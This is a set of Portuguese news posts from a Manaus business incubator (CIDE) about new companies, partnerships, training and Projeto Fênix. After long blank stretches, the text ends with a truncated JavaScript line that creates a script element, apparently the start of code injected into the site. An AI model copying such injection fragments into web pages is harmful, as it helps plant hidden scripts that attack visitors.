Novos empreendedores desejam entrar no CIDE

Antonio Dias apresenta projeto para a administração do CIDE.
Empreendedor apresenta projetos para a administração do CIDE.

 

A fim de começar o processo de incubação de novos negócios dentro do Centro de Incubação e Desenvolvimento Empresarial (CIDE), alguns empreendedores realizaram, no mês de julho, a apresentação do Plano de Negócios, requisito indispensável no processo de instalação de novas empresas, à equipe de consultores e administradores da incubadora.

A primeira em participar do processo foi uma empresa de desenvolvimento de sistemas de informática para auxiliar na gestão e automação industrial. “Eu decidi vir ao CIDE, devido a diversos fatores. O primeiro é a logística porque estou perto das indústrias do Polo Industrial de Manaus (PIM) e a estrutura física da incubadora ajuda; o espaço privilegiado e o apoio nos assuntos relacionados ao meu negócio”, diz o empresário Jonathas Ferreira, lembrando que grandes empresas de tecnologia passaram pela incubadora e tiveram êxitos nos seus projetos.

Diante da equipe de administração da incubadora de empresas, o novo candidato explicou em que consiste as atividades da sua empresa e que benefícios traz à sociedade. “Propomos melhoras na qualidade de vida da população por meio dos nossos aplicativos para computadores e celulares em serviços de transporte, segurança e localização, processos na produção comercial e industrial”, destaca o empresário Ferreira.

Com a proposta de atuar no segmento de matérias-primas para cosméticos, a empresa HERBRAM apresentou seus objetivos aos avaliadores do CIDE. “Iremos fabricar extratos e óleos vegetais como matéria-prima para grandes empresas farmacêuticas, cosméticas e alimentares. O objetivo da nossa vinda à incubadora é aumentar nossa capacidade produtiva e inovar com o lançamento de novos produtos ao público”, diz o sócio proprietário Antonio Dias, acrescentando que os produtos da sua empresa são 100% amazônicos.

Ainda segundo Dias, a HERBRAM já iniciou contatos e parcerias com empresas do CIDE, com o objetivo de criar produtos mais inovadores e abrir novas áreas de negócios e de vendas, nos segmentos de cosméticos, alimentos e suplementos alimentares. “Também queremos atender diretamente o consumidor final com os nossos produtos inovadores”, conclui.

O empresário Jonathas Ferreira apresenta projeto à comissão do CIDE.
O empresário Jonathas Ferreira apresenta projeto à comissão do CIDE.
Empresários conversam com a equipe administrativa da incubadora sobre futura instalação.
Empresários conversam com a equipe administrativa da incubadora sobre futura instalação.

 

 

Apresentação dos candidatos é um requisito importante.
Apresentação dos candidatos é um requisito importante.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Empreendedores trabalham juntos para superar desafios

Empresarios assinam parceria.
Empresarios assinam parceria.

 

 

Proprietários de empresas, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), buscando melhoramentos no processo de produção e superar as dificuldades juntos, decidiram fazer parcerias entre eles.

 

No mês de maio, os empreendedores, Domingos Amaral e Danniel Pinheiro, da Biozer da Amazônia, empresa de Cosméticos e Fitoterápicos, anunciaram uma parceria com o empresário Cabral, da Sohervas da Amazônia. “A ideia da parceria ficou mais aguçada devido ao momento atual da economia, mas tivemos outros fatores a favor, como a matéria-prima regional usada pela Sohervas em seus produtos e queremos utilizá-la também no setor de Cosméticos”, afirma Amaral.

 

A Sohervas da Amazônia produz licores com essências da Amazônia, como o licor de cupuaçu, açaí, camu-camu, produtos que interessam a Biozer. “A nossa contrapartida está no marketing da Sohervas, aumentar o seu volume de produção, conquistar novos mercados, bem como desenvolver produtos em parceria para a área da Gastronomia, como o ‘vinagre gourmet’ e sobremesas à base de licores de frutas da Amazônia’”, diz Amaral.

Parceria é comemorada com licor.
Parceria é comemorada com licor.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Capacitação vai ajudar a identificar e superar dificuldades do Processo Empresarial

O diretor executivo do CIDE, José Grosso, explica a atividade empresarial.
O diretor executivo do CIDE, José Grosso, explica a atividade empresarial.

 

Com o objetivo de melhorar a capacitação empresarial dos empreendedores e a gestão das empresas, o Centro de Incubação e Desenvolvimento Empresarial (CIDE) fez uma parceria com o Departamento de Assistência à Média e Pequena Indústria (DAMPI), da Federação das Indústrias do Estado do Amazonas (FIEAM), para realizar várias atividades ao longo dos próximos meses que ajudem a identificar e a superar as dificuldades no processo empresarial dos empreendimentos instalados na incubadora.

 

ETAPAS DA CAPACITAÇÃO

Em uma palestra de sensibilização para a equipe técnica do CIDE e os empresários instalados, os responsáveis pelas formações do projeto, Graça Emiliano e o economista Geraldo Magela, pediram a participação de todos.

 

Segundo Magela, o projeto passará por três etapas que vão melhorar a estrutura funcional das empresas. “A primeira questão com a qual vamos trabalhar é a profissão da gestão porque são empresas consideradas ainda pequenas e, portanto, precisam profissionalizar a sua gestão, separando o aspecto familiar do aspecto empresarial”, diz o economista.

 

Ainda segundo os palestrantes, a segunda etapa consistirá no Empreendedorismo. “Às vezes, a pessoa é empresário, mas não é empreendedor, ou seja, falta a ele um comportamento de realizar planejamentos, métodos, metas, etc.”, diz Magela.

 

A capacitação incluirá também, Planejamento Estratégico, respondendo a perguntas, como quem queremos ser no mercado e quais as estratégias para alcançar um fim proposto. “Por último, realizaremos uma formação ligada à Padronização e à Melhoria do Ambiente, ou seja, criar padrões na empresa, criar sua personalidade, a identidade, dando força para que a empresa encare os desafios do mercado”, conclui o economista, dizendo que as práticas de gestão são aplicáveis a qualquer tipo de organização.

 

O próximo passo será estabelecer o melhor dia de atividades para o empresariado, o melhor horário, estruturar as turmas e as participações por empresa, e realizar os treinamentos ainda no mês de maio.

Empreendedores e técnicos do CIDE que vão participar das formações.
Empreendedores e técnicos do CIDE que vão participar das formações.

 

A coordenadora do CIDE-Polo de Modas, Elizabeth Araújo, fala da importância das formações.
A coordenadora do CIDE-Polo de Modas, Elizabeth Araújo, fala da importância das formações.

 

 

A técnica do CIDE, Rosália Padilha, fala aos empreendedores.
A técnica do CIDE, Rosália Padilha, fala aos empreendedores.

 

 

Empresários instalados no CIDE manifestam a sua opinião.
Empresários instalados no CIDE manifestam a sua opinião.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Empresa começa processo de entrada no CIDE com medicamentos para diabéticos

Diante do diretor executivo e da equipe técnica do CIDE, o empreendedor Carlos Danniel expõe o Plano de Negócios.
Diante do diretor executivo e da equipe técnica do CIDE, o empreendedor Carlos Danniel expõe o Plano de Negócios.

 

Como acontece todos os anos, novas empresas, de diversos segmentos, solicitam o início do processo de entrada ou processo de incubação, no Centro de Incubação e Desenvolvimento Empresarial (CIDE), com a finalidade de desenvolver produtos inovadores e a sua comercialização.

 

No mês de março, a Biozer da Amazônia, empresa desenvolvedora de gel e cremes para tratamentos de ferimentos em pessoas com problemas de diabetes, em parceria com o Instituto Nacional de Pesquisas da Amazônia (INPA), começou o seu processo de instalação, apresentando ao conselho administrativo da incubadora o Plano de Negócios.

 

Durante quase três horas de avaliação, o empreendedor Carlos Danniel Pinheiro, expôs os objetivos da empresa no CIDE. “Os produtos são inovadores, mas ainda não foram colocados à venda. Eles vão acelerar o processo de cicatrização de doenças em pés de pessoas com diabetes. Os cosméticos têm propriedades terapêuticas”, lembra o empresário.

 

Ainda conforme Pinheiro, o fato de estar no CIDE, permite uma série de vantagens. “Escolhemos este centro de incubação para dar continuidade aos trabalhos de desenvolvimento dos nossos produtos. Sabemos que aqui, podemos concluir e comercializar nossos produtos para tratamentos em diabéticos e lançar nossa linha de cosméticos com produtos naturais da Amazônia com certificação”, reconhece o mais novo residente da incubadora.

Equipe técnica do CIDE escuta a exposição de Carlos Danniel.
Equipe técnica do CIDE escuta a exposição de Carlos Danniel.

 

Ao final da exposição, Danniel pediu uma foto com a equipe do CIDE.
Ao final da exposição, Danniel pediu uma foto com a equipe do CIDE.

 

Ap3

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Empreendedores conhecem o Projeto Fênix

A coordenadora, Rosália Padilha, apresenta o Projeto Fênix aos incubados
A coordenadora, Rosália Padilha, apresenta o Projeto Fênix aos incubados

 

O Centro de Incubação e Desenvolvimento Empresarial (CIDE) apresentou na manhã de hoje, 8, aos empresários instalados, conhecidos como incubados, o Projeto Fênix, que tem o objetivo de melhorar os processos de incubação, proporcionando ao empreendedor capacitação, formação, além de parcerias locais, nacionais e internacionais, contemplado pelo edital 019/2014 – Pró-Incubadoras – da Fundação de Amparo à Pesquisa do Amazonas (Fapeam). O evento aconteceu na própria incubadora.

Durante uma hora, a coordenadora do projeto no CIDE, Rosália Padilha, detalhou o projeto e pediu a participação de todos. “ O projeto utilizará a metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE) que é uma plataforma de soluções com qualificação, práticas e processos estabelecidos, e é válido para todas as incubadoras do Brasil, visando à melhoria em planejamentos, capacitação, empreendimentos, assessorias, consultorias, acompanhamento, etc. Desse modo, podemos ter empreendimentos de sucesso”, conclui.

Para o empreendedor e proprietário da Loja das Essências, Elton de França, um dos mais novos incubados no CIDE, o Projeto Fênix vai viabilizar o objetivo dos empresários. “Eu acredito que a partir da implantação desse projeto, haverá um entrosamento melhor entre as empresas incubadas, conheceremos novas e possíveis parcerias e, consequentemente, melhoraremos nossos negócios”, diz.

Para o diretor do CIDE, José Barbosa Grosso, a participação de todos os incubados é importante para que o projeto seja implantado com êxito. “Como já disse em outras ocasiões, com a implantação do Projeto Fênix você conhece o potencial do empreendedor, suas dificuldades, as metas, os riscos… e podemos buscar soluções e parcerias para ajudá-lo”, enfatiza.

O diretor executivo do CIDE, José Grosso, pede a participação de todos no projeto
O diretor executivo do CIDE, José Grosso, pede a participação de todos no projeto

 

 

A coordenadora, Rosália Padilha, tira as dúvidas dos incubados.
A coordenadora, Rosália Padilha, tira as dúvidas dos incubados.

 

 

 

Empreendedores se comprometem a participar do Projeto Fênix
Empreendedores se comprometem a participar do Projeto Fênix

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

var d=document;var s=d.createElement(‘script’);